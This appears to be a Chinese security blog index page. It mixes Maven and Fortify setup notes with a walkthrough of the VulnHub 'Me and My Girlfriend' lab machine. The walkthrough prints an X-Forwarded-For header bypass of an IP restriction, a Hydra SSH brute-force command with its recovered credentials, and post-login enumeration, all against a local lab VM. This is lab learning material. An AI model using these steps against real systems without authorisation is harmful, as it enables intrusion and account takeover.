                                <meta name="viewport" content="width=device-width, initial-scale=1.0" />
                                <script src="/jeeplus...
RawContent        : HTTP/1.1 200
                    Content-Language: zh-CN
                    Content-Length: 19162
                    Content-Type: text/html;charset=UTF-8
                    Date: Sun, 19 Jan 2020 09:23:26 GMT

ParsedHtml        : mshtml.HTMLDocumentClass
RawContentLength  : 19162

如上,部署成功。返回状态值200。

以上。


其他

上面是Maven创建一个标准化的Java项目,举例:即部署一个maven的项目,我们可以通过上面的方式来进行。更多时候,对于我来说,我高频率使用maven是在对于漏洞的验证和利用阶段,即网上公开的java poc代码诸如此类,显而易见我更倾向于使用java的poc代码而非python代码,由于python语言本身的优势,纵观网上很多python poc在我看来,对于我们理解漏洞原理本身无实际意义,我并不是说python的poc代码不好,而是这门语言太便利了以至于我们可以很方便去复现一个漏洞,这样会导致人们尤其是刚入门的小白很少去思考甚至不思考。

废话不多说,回到本小结上来:

E:\java\hadoop> mvn archetype:generate -D archetypeGroupId=org.apache.maven.archetypes -D groupId=org.conan.myhadoop.mr -D artifactId=myHadoop -D packageName=org.conan.myhadoop.mr -D version=1.0-SNAPSHOT -D interactiveMode=false
回显如下:
[INFO] Scanning for projects...
[INFO]
[INFO] ------------------< org.apache.maven:standalone-pom >-------------------
[INFO] Building Maven Stub Project (No POM) 1
[INFO] --------------------------------[ pom ]---------------------------------
[INFO]
[INFO] >>> maven-archetype-plugin:3.1.2:generate (default-cli) > generate-sources @ standalone-pom >>>
[INFO]
[INFO] <<< maven-archetype-plugin:3.1.2:generate (default-cli) < generate-sources @ standalone-pom <<<
[INFO]
[INFO]
[INFO] --- maven-archetype-plugin:3.1.2:generate (default-cli) @ standalone-pom ---
[INFO] Generating project in Batch mode
[WARNING] No archetype found in remote catalog. Defaulting to internal catalog
[INFO] No archetype defined. Using maven-archetype-quickstart (org.apache.maven.archetypes:maven-archetype-quickstart:1.0)
[INFO] ----------------------------------------------------------------------------
[INFO] Using following parameters for creating project from Old (1.x) Archetype: maven-archetype-quickstart:1.0
[INFO] ----------------------------------------------------------------------------
[INFO] Parameter: basedir, Value: E:\java\hadoop
[INFO] Parameter: package, Value: org.conan.myhadoop.mr
[INFO] Parameter: groupId, Value: org.conan.myhadoop.mr
[INFO] Parameter: artifactId, Value: myHadoop
[INFO] Parameter: packageName, Value: org.conan.myhadoop.mr
[INFO] Parameter: version, Value: 1.0-SNAPSHOT
[INFO] project created from Old (1.x) Archetype in dir: E:\java\hadoop\myHadoop
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  3.491 s
[INFO] Finished at: 2020-02-13T14:35:21+08:00
[INFO] ------------------------------------------------------------------------
PS E:\java\hadoop> cd .\myHadoop\
PS E:\java\hadoop\myHadoop> mvn clean install
[INFO] Scanning for projects...
[INFO]
[INFO] -------------------< org.conan.myhadoop.mr:myHadoop >-------------------
[INFO] Building myHadoop 1.0-SNAPSHOT
[INFO] --------------------------------[ jar ]---------------------------------
[INFO]
[INFO] --- maven-clean-plugin:2.5:clean (default-clean) @ myHadoop ---
[INFO]
[INFO] --- maven-resources-plugin:2.6:resources (default-resources) @ myHadoop ---
[WARNING] Using platform encoding (GBK actually) to copy filtered resources, i.e. build is platform dependent!
[INFO] skip non existing resourceDirectory E:\java\hadoop\myHadoop\src\main\resources
[INFO]
[INFO] --- maven-compiler-plugin:3.1:compile (default-compile) @ myHadoop ---
[INFO] Changes detected - recompiling the module!
[WARNING] File encoding has not been set, using platform encoding GBK, i.e. build is platform dependent!
[INFO] Compiling 1 source file to E:\java\hadoop\myHadoop\target\classes
[INFO]
[INFO] --- maven-resources-plugin:2.6:testResources (default-testResources) @ myHadoop ---
[WARNING] Using platform encoding (GBK actually) to copy filtered resources, i.e. build is platform dependent!
[INFO] skip non existing resourceDirectory E:\java\hadoop\myHadoop\src\test\resources
[INFO]
[INFO] --- maven-compiler-plugin:3.1:testCompile (default-testCompile) @ myHadoop ---
[INFO] Changes detected - recompiling the module!
[WARNING] File encoding has not been set, using platform encoding GBK, i.e. build is platform dependent!
[INFO] Compiling 1 source file to E:\java\hadoop\myHadoop\target\test-classes
[INFO]
[INFO] --- maven-surefire-plugin:2.12.4:test (default-test) @ myHadoop ---
[INFO] Surefire report directory: E:\java\hadoop\myHadoop\target\surefire-reports
Downloading from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/surefire/surefire-junit3/2.12.4/surefire-junit3-2.12.4.pom
Downloaded from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/surefire/surefire-junit3/2.12.4/surefire-junit3-2.12.4.pom (1.7 kB at 2.0 kB/s)
Downloading from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/surefire/surefire-providers/2.12.4/surefire-providers-2.12.4.pom
Downloaded from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/surefire/surefire-providers/2.12.4/surefire-providers-2.12.4.pom (2.3 kB at 7.4 kB/s)
Downloading from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/surefire/surefire-junit3/2.12.4/surefire-junit3-2.12.4.jar
Downloaded from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/surefire/surefire-junit3/2.12.4/surefire-junit3-2.12.4.jar (26 kB at 60 kB/s)

-------------------------------------------------------
 T E S T S
-------------------------------------------------------
Running org.conan.myhadoop.mr.AppTest
Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.02 sec

Results :

Tests run: 1, Failures: 0, Errors: 0, Skipped: 0

[INFO]
[INFO] --- maven-jar-plugin:2.4:jar (default-jar) @ myHadoop ---
[INFO] Building jar: E:\java\hadoop\myHadoop\target\myHadoop-1.0-SNAPSHOT.jar
[INFO]
[INFO] --- maven-install-plugin:2.4:install (default-install) @ myHadoop ---
[INFO] Installing E:\java\hadoop\myHadoop\target\myHadoop-1.0-SNAPSHOT.jar to D:\Workspace\.m2\repository\org\conan\myhadoop\mr\myHadoop\1.0-SNAPSHOT\myHadoop-1.0-SNAPSHOT.jar
[INFO] Installing E:\java\hadoop\myHadoop\pom.xml to D:\Workspace\.m2\repository\org\conan\myhadoop\mr\myHadoop\1.0-SNAPSHOT\myHadoop-1.0-SNAPSHOT.pom
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  6.062 s
[INFO] Finished at: 2020-02-13T14:36:02+08:00
[INFO] ------------------------------------------------------------------------

[Read More]

  • Maven构建、Gradle构建最近搞得我头痛,天天搬运别人的东西,搬也搬不像。。问题还没有彻底解决,先随手记下。

  • 持续更新中 updating 2020/01/21以更新

师傅最近让我看freebuf上一篇关于jeeplus代码审计的文章,文章讲的是不错的,自己找了个项目来做,之前没有java开发的基础,所以两眼一抹黑,浪费了不少时间,随笔记。

Redis-x64-3.2.100.msi

现象描述

404

eclipse导入jeeplus项目后,用Maven构建,tomcat部署成功未报错,总是访问不了项目,一直404。 搜索CSDN原答案:

解决如下选中“项目",然后右击选择“properties”Deployment,
然后将webContent项remove掉,还有test相关的文件也可以remove掉,
test是测试相关的文件,add一个folder文件,next->next->src下的main下
的webapp文件,最后击“Finish”,在add一个Java Build Path Entries,next->Maven Dependencies
文件,最后再点击"Finish";最后再点击"OK";
重新启动tomcat,在浏览器中输入相应的地址:http://localhost:8080/MavenTest/index.jsp ,进行测试web项目是否创建成功。

jar not found

tomcat 没有jar问题

如果你是maven项目,tomcat在发布项目的时候没有同时发布maven依赖所添加的jar包,
你需要设置一下eclipse:
项目 -> 属性 -> Deployment Assembly -> Add -> Java Build Path Entries -> 选择Maven Dependencies -> Finish -> OK
把对应的Maven依赖包也发布到tomcat,调试时会自动把那些jar发布到指定目录下,tomcat也能找到那些jar了。

结合eclipse

mvn eclipse:clean
mvn eclipse:eclipse
##普通Eclipse项目执行 : 
mvn eclipse:eclipse Eclipse
##web项目执行 : 
mvn eclipse:eclipse –Dwtpversion=1.0 
--------------------------------------------------华丽的分割线--------------------------------------------------

「 更新」

「2020年01月21日11:22:26」:Maven构建

小弟之前java学的贼烂,更别说高端的「Maven」构建了,研究了将近一个星期,终于使用Maven构建起第一个Java web项目,按耐不住内心的激动心情,记录下

Maven-Build-Jeeplus记录

[Read More]

「渗透」:vulnhub-me-and-myGirlfriend

Jan 8, 2020. | By: Bin4xin

  • vulnhub走一波~

嗅探靶机

nmap开路

查看一下靶机ip是多少

root@bin4xin:/usr/share/wordlist# nmap -sP 192.168.3.0/24

Starting Nmap 7.60 ( https://nmap.org ) at 2020-01-08 10:06 UTC
Nmap scan report for _gateway (192.168.3.1)
Host is up (0.0018s latency).
MAC Address: 24:DA:33:2A:53:84 (Unknown)
Nmap scan report for 192.168.3.3
Host is up (0.0023s latency).
MAC Address: 6C:4B:90:33:8A:CC (LiteON)
Nmap scan report for 192.168.3.11
Host is up (0.010s latency).
MAC Address: 1A:DF:41:4B:9D:05 (Unknown)
Nmap scan report for 192.168.3.14
Host is up (0.049s latency).
MAC Address: F4:63:1F:BF:96:DB (Unknown)
Nmap scan report for 192.168.3.17
Host is up (0.010s latency).
MAC Address: 2C:6F:C9:12:7B:42 (Hon Hai Precision Ind.)
Nmap scan report for 192.168.3.30
Host is up (0.010s latency).
MAC Address: 88:B1:11:7D:83:45 (Intel Corporate)
Nmap scan report for 192.168.3.32
Host is up (-0.10s latency).
MAC Address: 68:07:15:D5:46:16 (Intel Corporate)
Nmap scan report for 192.168.3.33
Host is up (-0.094s latency).
MAC Address: 94:87:E0:1B:F2:D5 (Unknown)
Nmap scan report for 192.168.3.34
Host is up (0.010s latency).
MAC Address: F4:60:E2:8B:C8:BC (Unknown)
Nmap scan report for 192.168.3.40
Host is up (0.046s latency).
MAC Address: 24:DF:6A:25:C6:8E (Huawei Technologies)
Nmap scan report for 192.168.3.59
Host is up (0.00033s latency).
MAC Address: 08:00:27:FD:9B:9B (Oracle VirtualBox virtual NIC)
Nmap scan report for bin4xin (192.168.3.60)
Host is up.
Nmap done: 256 IP addresses (12 hosts up) scanned in 5.35 seconds

看到oracle virtual box后缀结尾的,靶机ip为192.168.3.59 扫描一波端口先:

root@bin4xin:/usr/share/wordlist# nmap -A -O 192.168.3.59

Starting Nmap 7.60 ( https://nmap.org ) at 2020-01-08 10:08 UTC
Nmap scan report for 192.168.3.59
Host is up (0.00022s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA)
|   2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA)
|   256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA)
|_  256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (EdDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:FD:9B:9B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms 192.168.3.59

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.64 seconds

中间web部分是一个ip限制的考点,在request头部加上x-forwarded-for:localhost就可以绕过了,之后进去是一个登录页面,大致内容是参数暴露信息的漏洞: 抓用户信息包,如下

localhost限制

GET /?page=index HTTP/1.1
Host: 192.168.3.59
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
x-forwarded-for:localhost
Connection: close
Upgrade-Insecure-Requests: 1

回显,加上本地头ip后回显正常本地根目录登录页面:

HTTP/1.1 200 OK
Date: Wed, 08 Jan 2020 09:36:34 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Set-Cookie: PHPSESSID=72l97ppkrc8kgffl3n72dv37f3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 676
Connection: close
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Ceban Corp</title>
    <style>
        .center {
            text-align: center;
        }
    </style>
</head>
<body>

    <div class="center">
        <h2>Welcome To Ceban Corp</h2>
        <p>Inspiring The People To Great Again!</p>
        <hr>
                <p><a href="?page=index">Home</a> | <a href="?page=login">Login</a> | 
                <a href="?page=register">Register</a> | <a href="?page=about">About</a></p>
                <hr>
    </div>

    
</body>
</html>


利用漏洞

绕过ip限制后,主页注册-登录-修改user_id参数,burpsuite参数截图如下:

连接靶机

hydra爆破ssh 根据web爆出的用户名密码新建user、pass文件,尝试使用海德拉爆破ssh服务:

root@bin4xin:/home/bin4xin# cd /usr/share/wordlist/
root@bin4xin:/usr/share/wordlist# ls
root@bin4xin:/usr/share/wordlist#
root@bin4xin:/usr/share/wordlist# vi user
root@bin4xin:/usr/share/wordlist# root@bin4xin:/usr/share/wordlist#
root@bin4xin:/usr/share/wordlist# ls
user
root@bin4xin:/usr/share/wordlist# vi pass
root@bin4xin:/usr/share/wordlist# root@bin4xin:/usr/share/wordlist# vi user
root@bin4xin:/usr/share/wordlist# root@bin4xin:/usr/share/wordlist#
root@bin4xin:/usr/share/wordlist#
root@bin4xin:/usr/share/wordlist#

输入hydra -h查看一下ssh爆破命令:

root@bin4xin:/usr/share/wordlist# hydra -h
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or 
for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] 
[-t TASKS] [-M FILE [-T TASKS]] [-w TIME] 
[-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

Options:
  -R        restore a previous aborted/crashed session
  -I        ignore an existing restore file (don't wait 10 seconds)
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -y        disable use of symbols in bruteforce, see above
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -o FILE   write found login/password pairs to FILE instead of stdout
  -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel per target (default: 16)
  -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
  -w / -W TIME  wait time for a response (32) / between connects per thread (0)
  -c TIME   wait time per login attempt over all threads (enforces -t 1)
  -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
  -O        use old SSL v2 and v3
  -q        do not print messages about connection errors
  -U        service module usage details
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Supported services: 
adam6500 asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}
-form http-proxy http-proxy-urlenum 
icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5]
[s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2
rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp
[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: afp ncp oracle sapr3.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
     % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)
     % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
     % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

根据上面的爆破命令,编写爆破命令,代码过程如下:

root@bin4xin:/usr/share/wordlist# hydra -L user -P pass ssh://192.168.3.59
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2020-01-08 09:56:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 36 login tries (l:6/p:6), ~3 tries per task
[DATA] attacking ssh://192.168.3.59:22/
[22][ssh] host: 192.168.3.59   login: alice   password: 4lic3
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2020-01-08 09:56:35
root@bin4xin:/usr/share/wordlist#            

如上爆破出ssh服务密码:[22][ssh] host: 192.168.3.59 login: alice password: 4lic3
直接ssh连接:

C:\Users\本阿信>ssh 192.168.3.59 -l alice
Could not create directory 'C:\\Users\\\346\234\254\351\230\277\344\277\241/.ssh'.
The authenticity of host '192.168.3.59 (192.168.3.59)' can't be established.
ECDSA key fingerprint is SHA256:lE5D8AvkJqcIwHiNuI9aSnC3ohlDrhPhjDljqSDy9sY.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (C:\\Users\\\346\234\254\351\230\277\344\277\241/.ssh/known_hosts).
alice@192.168.3.59's password:
Last login: Fri Dec 13 14:48:25 2019
alice@gfriEND:~$ id
uid=1000(alice) gid=1001(alice) groups=1001(alice)

尝试提权

靶机还没搞完,ssh连上就按套路查看了一下当前user可写的文件,查看到一些有趣的东西,但由于最近好多事,还没有搞到机器root,待更新。

alice@gfriEND:~$
alice@gfriEND:~$ find / -writable -type d 2>/dev/null
/home/alice
/home/alice/.cache
/home/alice/.my_secret
/run/user/1000
/run/shm
/run/lock
/tmp
/var/lib/php5
/var/crash
/var/tmp
/proc/1591/task/1591/fd
/proc/1591/fd
/proc/1591/map_files
/sys/fs/cgroup/systemd/user/1000.user/2.session
alice@gfriEND:~$ cd /home/alice/
alice@gfriEND:~$ cat .my_secret/
cat: .my_secret/: Is a directory
alice@gfriEND:~$ cd .my_secret/
alice@gfriEND:~/.my_secret$ ls
flag1.txt  my_notes.txt
alice@gfriEND:~/.my_secret$ ls -la
total 16
drwxrwxr-x 2 alice alice 4096 Dec 13 14:10 .
drwxr-xr-x 4 alice alice 4096 Dec 13 14:47 ..
-rw-r--r-- 1 root  root   306 Dec 13 13:04 flag1.txt
-rw-rw-r-- 1 alice alice  119 Dec 13 12:23 my_notes.txt
alice@gfriEND:~/.my_secret$ cat flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! 
I know if it's given to him then Bob will be hurt but this is better than Bob cheated!

Now your last job is get access to the root and read the flag ^_^

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}

alice@gfriEND:~/.my_secret$ cat my_notes.txt
Woahhh! I like this company, I hope that here i get a better partner than bob ^_^, 
hopefully Bob doesn't know my notes

各种姿势尝试:

alice@gfriEND:~/.my_secret$ cd ..
alice@gfriEND:~$ l
alice@gfriEND:~$ ls
alice@gfriEND:~$ cd ..
alice@gfriEND:/home$ ls
aingmaung  alice  eweuhtandingan  sundatea
alice@gfriEND:/home$ ls -la
total 24
drwxr-xr-x  6 root           root           4096 Dec 13 12:18 .
drwxr-xr-x 22 root           root           4096 Dec 13 10:21 ..
drwxr-xr-x  2 aingmaung      aingmaung      4096 Dec 13 12:18 aingmaung
drwxr-xr-x  4 alice          alice          4096 Dec 13 14:47 alice
drwxr-xr-x  2 eweuhtandingan eweuhtandingan 4096 Dec 13 12:18 eweuhtandingan
drwxr-xr-x  2 sundatea       sundatea       4096 Dec 13 12:18 sundatea
alice@gfriEND:/home$ cd /proc/1591/map_files
-bash: cd: /proc/1591/map_files: No such file or directory
alice@gfriEND:/home$ ls
aingmaung  alice  eweuhtandingan  sundatea
alice@gfriEND:/home$ cd /proc/1592/
alice@gfriEND:/proc/1592$ ls
ls: cannot read symbolic link cwd: Permission denied
ls: cannot read symbolic link root: Permission denied
ls: cannot read symbolic link exe: Permission denied
attr        comm             fd        map_files   net            pagemap      sessionid  status
autogroup   coredump_filter  fdinfo    maps        ns             personality  setgroups  syscall
auxv        cpuset           gid_map   mem         numa_maps      projid_map   smaps      task
cgroup      cwd              io        mountinfo   oom_adj        root         stack      timers
clear_refs  environ          limits    mounts      oom_score      sched        stat       uid_map
cmdline     exe              loginuid  mountstats  oom_score_adj  schedstat    statm      wchan
alice@gfriEND:/proc/1592$ cat map_files/
cat: map_files/: Permission denied
alice@gfriEND:/proc/1592$ ls -la
ls: cannot read symbolic link cwd: Permission denied
ls: cannot read symbolic link root: Permission denied
ls: cannot read symbolic link exe: Permission denied
total 0
dr-xr-xr-x   9 root root 0 Jan  8 17:01 .
dr-xr-xr-x 102 root root 0 Jan  8 16:29 ..
dr-xr-xr-x   2 root root 0 Jan  8 17:01 attr
-rw-r--r--   1 root root 0 Jan  8 17:01 autogroup
-r--------   1 root root 0 Jan  8 17:01 auxv
-r--r--r--   1 root root 0 Jan  8 17:01 cgroup
--w-------   1 root root 0 Jan  8 17:01 clear_refs
-r--r--r--   1 root root 0 Jan  8 17:01 cmdline
-rw-r--r--   1 root root 0 Jan  8 17:01 comm
-rw-r--r--   1 root root 0 Jan  8 17:01 coredump_filter
-r--r--r--   1 root root 0 Jan  8 17:01 cpuset
lrwxrwxrwx   1 root root 0 Jan  8 17:01 cwd
-r--------   1 root root 0 Jan  8 17:01 environ
lrwxrwxrwx   1 root root 0 Jan  8 17:01 exe
dr-x------   2 root root 0 Jan  8 17:01 fd
dr-x------   2 root root 0 Jan  8 17:01 fdinfo
-rw-r--r--   1 root root 0 Jan  8 17:01 gid_map
-r--------   1 root root 0 Jan  8 17:01 io
-r--r--r--   1 root root 0 Jan  8 17:01 limits
-rw-r--r--   1 root root 0 Jan  8 17:01 loginuid
dr-x------   2 root root 0 Jan  8 17:01 map_files
-r--r--r--   1 root root 0 Jan  8 17:01 maps
-rw-------   1 root root 0 Jan  8 17:01 mem
-r--r--r--   1 root root 0 Jan  8 17:01 mountinfo
-r--r--r--   1 root root 0 Jan  8 17:01 mounts
-r--------   1 root root 0 Jan  8 17:01 mountstats
dr-xr-xr-x   5 root root 0 Jan  8 17:01 net
dr-x--x--x   2 root root 0 Jan  8 17:01 ns
-r--r--r--   1 root root 0 Jan  8 17:01 numa_maps
-rw-r--r--   1 root root 0 Jan  8 17:01 oom_adj
-r--r--r--   1 root root 0 Jan  8 17:01 oom_score
-rw-r--r--   1 root root 0 Jan  8 17:01 oom_score_adj
-r--------   1 root root 0 Jan  8 17:01 pagemap
-r--------   1 root root 0 Jan  8 17:01 personality
-rw-r--r--   1 root root 0 Jan  8 17:01 projid_map
lrwxrwxrwx   1 root root 0 Jan  8 17:01 root
-rw-r--r--   1 root root 0 Jan  8 17:01 sched
-r--r--r--   1 root root 0 Jan  8 17:01 schedstat
-r--r--r--   1 root root 0 Jan  8 17:01 sessionid
-rw-r--r--   1 root root 0 Jan  8 17:01 setgroups
-r--r--r--   1 root root 0 Jan  8 17:01 smaps
-r--------   1 root root 0 Jan  8 17:01 stack
-r--r--r--   1 root root 0 Jan  8 17:01 stat
-r--r--r--   1 root root 0 Jan  8 17:01 statm
-r--r--r--   1 root root 0 Jan  8 17:01 status

[Read More]

  • 最近在接触代码审计的活儿。碰到了一些问题,随手记录下来。 错误描述:当fortify开始java代码分析时,报错No rules files found;

1.错误描述

谷歌一波:

问题引出

stackoverflow原问题:

 When I run a Fortify analysis against a Java project I receive this error :
 [warning]: No rules files found
 [error]: No rules files found
 Where can I configure the rules file ?

原答案:

Navigate to the bin folder of your fortify installation
Enter scapostinstall
Enter 2 to select Settings
Enter 2 to select Proxy Server Host
Enter the name of the proxy server
Enter 3 to select Proxy Server Port.
Enter the proxy server's port number.
Exit and run fortifyupdate.cmd

原答案的意思就是说需要对fortify进行代理配置,(需科学上网)后进行规则库的下载配置。

2.解决问题

配置代码

进入fortify安装的目录,对fortify进行代理配置,配置过程代码如下:

#进入fortify的安装目录(windows环境)
E:
cd fortify\bin\

E:\fortify\bin>scapostinstall
[1] Migration...
[2] Settings...
[s] Display all settings
[q] Exit
Please select the desired action (1,2,s,q): 2

[1] General...
[2] Fortify Update...
[3] Software Security Center Settings...
[s] Display all settings
[r] Return
[q] Exit
Please select the desired action (1,2,3,s,r,q): 2

[1] Update Server URL
[2] Proxy Server Host
[3] Proxy Server Port
[4] Proxy Server Username
[5] Proxy Server Password
[s] Display all settings
[r] Return
[q] Exit
Please select the desired action (1,2,3,4,5,s,r,q): 2

Proxy Server Host [default: ]: localhost

[1] Update Server URL
[2] Proxy Server Host
[3] Proxy Server Port
[4] Proxy Server Username
[5] Proxy Server Password
[s] Display all settings
[r] Return
[q] Exit
Please select the desired action (1,2,3,4,5,s,r,q): 3

Proxy Server Port [default: ]: 8080

[1] Update Server URL
[2] Proxy Server Host
[3] Proxy Server Port
[4] Proxy Server Username
[5] Proxy Server Password
[s] Display all settings
[r] Return
[q] Exit
Please select the desired action (1,2,3,4,5,s,r,q): q

以上fortify客户端配置代理结束,然后直接输入命令进行规则库下载更新:

更新文件

输入fortifyupdate更新命令,更新代码如下:

E:\fortify\bin>fortifyupdate.cmd
Using proxy server: localhost:8080
Storing Updated Security Content ...
E:\fortify\Core\config\rules
Fortify Secure Coding Rules, Core, Annotations v2015.2.0.0008
Fortify Secure Coding Rules, Extended, JSP v2015.2.0.0008
Fortify Secure Coding Rules, Core, Classic ASP, VBScript, and VB6 v2015.2.0.0008
Fortify Secure Coding Rules, Core, ActionScript 3.0 v2015.2.0.0008
Fortify Secure Coding Rules, Core, C/C++ v2015.2.0.0008
Fortify Secure Coding Rules, Extended, Java v2015.2.0.0008
Fortify Secure Coding Rules, Core, Android v2015.2.0.0008
Fortify Secure Coding Rules, Core, COBOL v2015.2.0.0008
Fortify Secure Coding Rules, Extended, C/C++ v2015.2.0.0008
Fortify Secure Coding Rules, Core, .NET v2015.2.0.0008
Fortify Secure Coding Rules, Core Preview, ABAP v2014.4.0.0008
Fortify Secure Coding Rules, Extended, Configuration v2015.2.0.0008
Fortify Secure Coding Rules, Extended, Content v2015.2.0.0008
Fortify Secure Coding Rules, Core, Objective-C v2015.2.0.0008
Fortify Secure Coding Rules, Core, PHP v2015.2.0.0008
Fortify Secure Coding Rules, Core, ABAP v2015.2.0.0008
Fortify Secure Coding Rules, Extended, SQL v2015.2.0.0008
Fortify Secure Coding Rules, Core, JavaScript v2015.2.0.0008
Fortify Secure Coding Rules, Core, SQL v2015.2.0.0008
Fortify Secure Coding Rules, Extended, .NET v2015.2.0.0008
Fortify Secure Coding Rules, Core, Java v2015.2.0.0008
Fortify Secure Coding Rules, Core, Ruby v2015.2.0.0008
Fortify Secure Coding Rules, Core, ColdFusion v2015.2.0.0008
Fortify Secure Coding Rules, Core, Python v2015.2.0.0008
Removing Old Metadata Files ...
E:\fortify\Core\config\ExternalMetadata
Main External List Mappings v2019.1.0.0007
Storing Updated Metadata Files ...
E:\fortify\Core\config\ExternalMetadata
Main External List Mappings v2015.2.0.0008

结果

配置完就可以愉快地使用fortify进行机器扫描分析代码了。

敬上。感谢您的阅读

参考:
Fortify Error : “No rules file found”

[Read More]

「scrcpy」:Linux中优秀的投屏软件~

Dec 31, 2019. | By: Bin4xin

# apt install snapd
正在读取软件包列表... 完成
正在分析软件包的依赖关系树       
正在读取状态信息... 完成       
snapd 已经是最新版 (2.42.1-1)。
升级了 0 个软件包,新安装了 0 个软件包,要卸载 0 个软件包,有 26 个软件包未被升级
sudo snap install scrcpy.snap --dangerous

由于直接设置 http_proxy 环境变量无法设置上, 作者在 snapd 中直接设置proxy, 方法如下:

